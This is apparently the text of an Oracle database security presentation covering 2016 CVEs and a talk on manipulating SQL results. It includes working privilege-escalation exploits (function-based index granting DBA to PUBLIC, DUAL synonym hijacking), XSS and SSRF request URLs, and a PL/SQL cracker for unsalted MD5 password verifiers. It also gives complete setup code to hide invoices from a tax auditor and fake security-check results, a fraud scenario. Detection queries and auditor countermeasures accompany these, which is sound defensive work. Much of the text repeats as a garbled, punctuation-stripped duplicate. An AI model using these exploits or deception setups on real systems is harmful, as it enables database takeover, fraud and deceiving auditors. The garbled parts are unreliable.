Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE (DIGEST VERIFIER)
Shown as an open problem in the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 / SHA-512 based algorithm.
The new "T:" password hash is 10 times slower to compute (and therefore to crack) than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1 based "S:" hash (Oracle 11+).
The new algorithm is known and already implemented in some cracking tools.
Remark: a Microsoft Office 2013 hash is still 10 times more time-consuming to crack than the new Oracle PBKDF2 hash.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617 (HTTP Digest Authentication):
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a "secret": the realm, which is the fixed string 'XDB'. For the password tiger the digest verifier is therefore the RFC 2617 HA1, MD5(<username>:XDB:tiger), with nothing per user in it except the user name, and it is stored in the SPARE4 column of SYS.USER$ as the part starting with "H:".
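As an added example, not from the slides: the block below checks one account's H: verifier against a short candidate list, which is exactly the attack an unsalted MD5 digest invites. It assumes the verifier is the RFC 2617 HA1 for the realm XDB, MD5(USERNAME:XDB:password) in upper-case hex, that it runs as SYS (SELECT on SYS.USER$ and EXECUTE on DBMS_CRYPTO), and that the user name SCOTT and the word list are constructed for the demonstration.

```sql
-- Added example: dictionary check of the unsalted H: (XDB digest) verifier.
-- Assumptions: executed as SYS; target user and word list are made up.
SET SERVEROUTPUT ON
DECLARE
  TYPE words_t IS TABLE OF VARCHAR2(30);
  -- constructed candidate list; a real check would read a word list
  candidates words_t := words_t('oracle', 'manager', 'tiger', 'change_on_install');
  v_user     VARCHAR2(128) := 'SCOTT';   -- assumed target account
  v_spare4   VARCHAR2(4000);
  v_stored   VARCHAR2(32);
  v_calc     VARCHAR2(32);
BEGIN
  -- SPARE4 holds 'S:<sha1>;H:<md5>;T:<pbkdf2>'; take the 32 hex digits after 'H:'
  SELECT spare4 INTO v_spare4
    FROM sys.user$
   WHERE name = v_user AND type# = 1;
  v_stored := UPPER(REGEXP_SUBSTR(v_spare4, 'H:([0-9A-Fa-f]{32})', 1, 1, NULL, 1));
  IF v_stored IS NULL THEN
    DBMS_OUTPUT.PUT_LINE('no H: verifier stored for ' || v_user);
    RETURN;
  END IF;
  FOR i IN 1 .. candidates.COUNT LOOP
    -- RFC 2617 HA1 with the fixed realm XDB: no salt, only the user name differs
    v_calc := RAWTOHEX(DBMS_CRYPTO.HASH(
                UTL_RAW.CAST_TO_RAW(v_user || ':XDB:' || candidates(i)),
                DBMS_CRYPTO.HASH_MD5));
    IF v_calc = v_stored THEN
      DBMS_OUTPUT.PUT_LINE(v_user || ' has the password ''' || candidates(i) || '''');
      RETURN;
    END IF;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE('no candidate matched for ' || v_user);
END;
/
```

One MD5 per candidate is the whole cost. The same loop against the T: verifier would need a full PBKDF2 derivation per candidate, which is the difference the timing numbers above describe; as long as the H: verifier is still stored next to it, the attacker simply cracks the weaker one and gets the same password.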
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the EXECUTE privilege on DBMS_PDB_EXEC_SQL, so after first exploiting a vulnerability in a publicly executable PL/SQL object owned by XDB an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the definer-rights to the invoker-rights execution model (after patching, the AUTHID column of DBA_PROCEDURES shows CURRENT_USER for both).
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

$ sqlplus sysman_apm@rdsora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist
==> the user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME      PRIVILEGE              ADM
------------  ---------------------  ---
SYSMAN_APM    UNLIMITED TABLESPACE   NO
SYSMAN_APM    CREATE VIEW            NO
SYSMAN_APM    CREATE ANY LIBRARY     NO
SYSMAN_APM    CREATE SEQUENCE        NO
SYSMAN_APM    CREATE TABLE           NO
SYSMAN_APM    CREATE LIBRARY         NO
SYSMAN_APM    CREATE ANY INDEX       NO
==> CREATE ANY LIBRARY and CREATE ANY INDEX are granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME      GRANTED_ROLE   ADM  DEF  OS_
------------  -------------  ---  ---  ---
SYSMAN_APM    CONNECT        NO   YES  NO
SYSMAN_APM    RESOURCE       NO   YES  NO
==> Create a function GETDBA to escalate privileges, using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       execute immediate 'grant dba to public';
       COMMIT;
       RETURN FOO;
     END;
     /
==> Grant execute to PUBLIC
SQL> grant execute on getdba to public;
==> Create a function-based index (FBI) on SYSTEM.HELP with getdba in the index expression. CREATE ANY INDEX lets SYSMAN_APM index a table in a foreign schema, and the expression is evaluated as the table owner SYSTEM, which holds the DBA role.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary (the new role grant applies to new sessions)
SQL> select * from dba_role_privs where granted_role = 'DBA' and grantee = 'PUBLIC';
GRANTEE   GRANTED_ROLE   ADM  DEF
--------  -------------  ---  ---
PUBLIC    DBA            NO   YES
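As an added example (not part of the talk), the queries below look for the ingredients of the function-based-index escalation shown for CVE-2016-3489 and CVE-2016-5604 and for the artefacts it leaves behind: INDEX grants on SYS tables, holders of CREATE ANY INDEX, CREATE ANY PROCEDURE and INHERIT ANY PRIVILEGES, function-based indexes on SYS or SYSTEM tables whose expression calls a function from another schema, and invoker-rights functions that issue grants dynamically. They run as a DBA on 11.2 or 12.1; the REVOKE at the end is 12c syntax, and SYSTEM is only an example of an administrative account to protect.

```sql
-- Added example: preconditions and artefacts of the FBI privilege escalation.
-- Run as SYS or a DBA; dictionary views only, nothing is changed until step 5.

-- 1. INDEX object privilege on SYS-owned tables held by anyone but SYS
--    (11.2.0.4 default: SYSTEM on INCEXP, INCFIL, INCVID)
SELECT grantee, owner, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner = 'SYS'
   AND grantee <> 'SYS';

-- 2. System privileges that let a user index a foreign table, plant a function
--    in a foreign schema, or inherit the invoker's privileges (12c)
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE', 'INHERIT ANY PRIVILEGES')
   AND grantee NOT IN ('SYS', 'DBA')
 ORDER BY privilege, grantee;

-- 3. Function-based indexes on SYS/SYSTEM tables: the expression is evaluated
--    with the table owner's privileges, so it must not call a function from
--    any other schema. COLUMN_EXPRESSION is a LONG, review it by eye.
SELECT i.owner AS index_owner, i.index_name, i.table_owner, i.table_name,
       e.column_expression
  FROM dba_indexes i
  JOIN dba_ind_expressions e
    ON e.index_owner = i.owner AND e.index_name = i.index_name
 WHERE i.table_owner IN ('SYS', 'SYSTEM')
   AND i.index_type LIKE 'FUNCTION-BASED%';

-- 4. Invoker-rights functions that issue GRANTs dynamically (rough heuristic:
--    EXECUTE IMMEDIATE and GRANT on the same source line)
SELECT s.owner, s.name, s.line, s.text
  FROM dba_source s
  JOIN dba_procedures p
    ON p.owner = s.owner AND p.object_name = s.name
 WHERE p.authid = 'CURRENT_USER'
   AND s.owner <> 'SYS'
   AND UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%GRANT%';

-- 5. 12c hardening: a function owned by somebody else must not run with an
--    administrative account's privileges. By default PUBLIC holds INHERIT
--    PRIVILEGES on every user; revoke it for the privileged ones.
REVOKE INHERIT PRIVILEGES ON USER system FROM PUBLIC;
```

Step 3 is the one that finds an attack that already happened: the EXPLOIT_INDEX from the slides shows up there with the foreign function in its expression, even after the grant it issued has been cleaned up.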
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the DBA's office and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary …"
Scenario 2
Remove your own audit entries from the audit log that the SIEM solution (e.g. Splunk, QRadar, …) retrieves via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you just deliver the "proper" results.
A lot of different wishes …
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfil these wishes without affecting other users …
All these scenarios have in common that we have to manipulate a SQL statement.
Select value …
Oracle Data Redaction allows you to mask or manipulate the selected data just for a single database user.
Possible usage: replace TRUE/FALSE, replace USER/ADMIN, …; the DBA decides what will be returned.
Select value …
A typical query from security checklists or scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but the column contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks …
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add a condition such as spare1 <> 'DBA1', the OS user column of SYS.AUD$, to the view dba_audit_trail): all entries of the OS user DBA1 disappear from the view, so if a SIEM solution retrieves the audit data through the view, nothing from DBA1 is retrieved
create or change synonyms to "redirect" objects
replace a table with a view plus an INSTEAD OF trigger
-------- dbms_macadm --------
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS ANALYSIS VIA A VIEW NAMED DUAL
Red Attack: Die Katastrophe in der Datenbank ("the catastrophe in the database"), talk by Gunther Pipperr
… where x=y
WHERE conditions can be changed using VPD (Virtual Private Database).
VPD adds a WHERE clause, e.g. invoice_name <> 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows you to replace an entire query: the user submits query A, the SQL Translation Framework replaces query A with query B.
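The following is an added example, not code from the talk, showing how a DBA would actually set up the three manipulations described above (Data Redaction, VPD, SQL translation) against one account. Everything in it is hypothetical: a schema APP with the tables INVOICE(invoice_no, invoice_name, amount) and PARAMETER(name, value), a database user AUDITOR, and a DBA session that may create policies, translation profiles and a database-level logon trigger. Data Redaction and the SQL Translation Framework need 12c.

```sql
-- Added example: DBA-side setup of the three query manipulations.
-- Hypothetical objects: APP.INVOICE, APP.PARAMETER, user AUDITOR. Run as a DBA.

-- (1) VPD: hide one invoice, but only from the AUDITOR session
CREATE OR REPLACE FUNCTION app.hide_invoice(p_schema IN VARCHAR2, p_obj IN VARCHAR2)
  RETURN VARCHAR2 AS
BEGIN
  IF SYS_CONTEXT('USERENV', 'SESSION_USER') = 'AUDITOR' THEN
    RETURN q'[invoice_name <> 'SAUNA_CLUB CHANTAL']';
  END IF;
  RETURN NULL;   -- no predicate for everybody else, so nobody notices
END;
/
BEGIN
  DBMS_RLS.ADD_POLICY(object_schema   => 'APP',  object_name     => 'INVOICE',
                      policy_name     => 'INVOICE_FILTER',
                      function_schema => 'APP',  policy_function => 'HIDE_INVOICE',
                      statement_types => 'SELECT');
END;
/

-- (2) Data Redaction: the scanner's account reads TRUE where the column says FALSE
BEGIN
  DBMS_REDACT.ADD_POLICY(object_schema  => 'APP', object_name => 'PARAMETER',
                         column_name    => 'VALUE', policy_name => 'PARAM_GREEN',
                         function_type  => DBMS_REDACT.REGEXP,
                         regexp_pattern => 'FALSE', regexp_replace_string => 'TRUE',
                         regexp_position   => DBMS_REDACT.RE_BEGINNING,
                         regexp_occurrence => DBMS_REDACT.RE_ALL,
                         expression => q'[SYS_CONTEXT('USERENV','SESSION_USER') = 'AUDITOR']');
END;
/

-- (3) SQL Translation Framework: swap the checklist query for a harmless one.
--     The match is on the statement text, which is why a random string in the
--     query defeats a registered translation.
BEGIN
  DBMS_SQL_TRANSLATOR.CREATE_PROFILE('APP.AUDIT_PROFILE');
  DBMS_SQL_TRANSLATOR.REGISTER_SQL_TRANSLATION(
    profile_name    => 'APP.AUDIT_PROFILE',
    sql_text        => q'[select upper(value) from parameter where upper(name) = 'XYZ']',
    translated_text => q'[select 'TRUE' from dual]');
END;
/
GRANT USE ON SQL TRANSLATION PROFILE app.audit_profile TO auditor;

-- switch the profile on transparently when AUDITOR logs in
CREATE OR REPLACE TRIGGER auditor_logon AFTER LOGON ON DATABASE
BEGIN
  IF SYS_CONTEXT('USERENV', 'SESSION_USER') = 'AUDITOR' THEN
    EXECUTE IMMEDIATE 'ALTER SESSION SET SQL_TRANSLATION_PROFILE = APP.AUDIT_PROFILE';
    -- SQL*Plus and most tools never ask the server for translation; this is the
    -- event Oracle documents for testing translation from such clients
    EXECUTE IMMEDIATE q'[ALTER SESSION SET EVENTS = '10601 trace name context forever, level 32']';
  END IF;
END;
/
```

Everybody except AUDITOR sees the unchanged data, which is what makes the change so hard to notice from the application side; the dictionary views that record each of these policies are the only place it is visible.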
Possible countermeasures for paranoid auditors
Add a random string, e.g. 'aksdjhiuz', to your queries to avoid the SQL Translation Framework (the statement gets a new SQL_ID and no longer matches a registered translation; a custom translator package could still rewrite it, so also check which profiles exist)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application); note that Data Redaction has its own privilege, EXEMPT REDACTION POLICY
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
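As an added example for the checklist above and for the DUAL redirection shown in the dbms_macadm case, this is the read-only pre-flight an auditor can run before trusting any result. It assumes a DBA-level account (the DBA_* views, V$PARAMETER, DBMS_METADATA and DBMS_CRYPTO), 12c for REDACTION_POLICIES, the DBA_SQL_TRANSLATION* views and DBMS_CRYPTO.HASH_SH256, and a hypothetical table name INVOICE in the last query.

```sql
-- Added example: an auditor's pre-flight, one check per countermeasure above.
-- Read-only; needs the DBA_* views. REDACTION_POLICIES, DBA_SQL_TRANSLATION*
-- and DBMS_CRYPTO.HASH_SH256 are 12c.

-- Who am I, and which schema do unqualified names resolve to right now?
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;     -- fully qualified on purpose

-- Does DUAL still resolve to SYS's table? (the DVSYS case replaced the synonym)
SELECT owner, object_name, object_type, last_ddl_time
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND NOT (owner = 'SYS' AND object_type = 'TABLE');
SELECT owner, synonym_name, table_owner, table_name
  FROM dba_synonyms
 WHERE synonym_name = 'DUAL'
   AND NOT (table_owner = 'SYS' AND table_name = 'DUAL');

-- VPD: which policies are active, and am I exempt?
SELECT object_owner, object_name, policy_name, pf_owner, package, "FUNCTION", enable
  FROM dba_policies;
SELECT privilege FROM session_privs WHERE privilege = 'EXEMPT ACCESS POLICY';

-- Data Redaction: policies, and the separate exemption it needs
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies;
SELECT privilege FROM session_privs WHERE privilege = 'EXEMPT REDACTION POLICY';

-- SQL translation: profile active in this session, profiles that exist, what
-- they rewrite, and the logon triggers that could switch one on
SELECT value FROM v$parameter WHERE name = 'sql_translation_profile';
SELECT owner, profile_name FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text FROM dba_sql_translations;
SELECT owner, trigger_name, triggering_event, status
  FROM dba_triggers
 WHERE triggering_event LIKE '%LOGON%';

-- Dictionary views the SIEM or checklist relies on: modification time and a
-- checksum of the DDL to compare against a known-good installation
SELECT o.object_name, o.last_ddl_time,
       RAWTOHEX(DBMS_CRYPTO.HASH(
         DBMS_METADATA.GET_DDL('VIEW', o.object_name, o.owner),
         DBMS_CRYPTO.HASH_SH256)) AS ddl_sha256
  FROM dba_objects o
 WHERE o.owner = 'SYS'
   AND o.object_type = 'VIEW'
   AND o.object_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS');

-- Is the object I am about to query really a table? (INVOICE is hypothetical)
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'INVOICE';
```

The checksum query is only useful with a reference value taken from a clean installation at the same patch level, since a CPU also recompiles dictionary views; the LAST_DDL_TIME next to it tells you whether a view changed outside a patch window.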
Modifying queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs, auditors and the security department should be aware of powerful Oracle features which can be used to modify application logic
Audit these features even if they are not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you. Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;   -- unqualified DUAL, resolved via the public synonym
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user != 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide „certain“ invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows to replace an entire query. The user submits Query A; the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID).
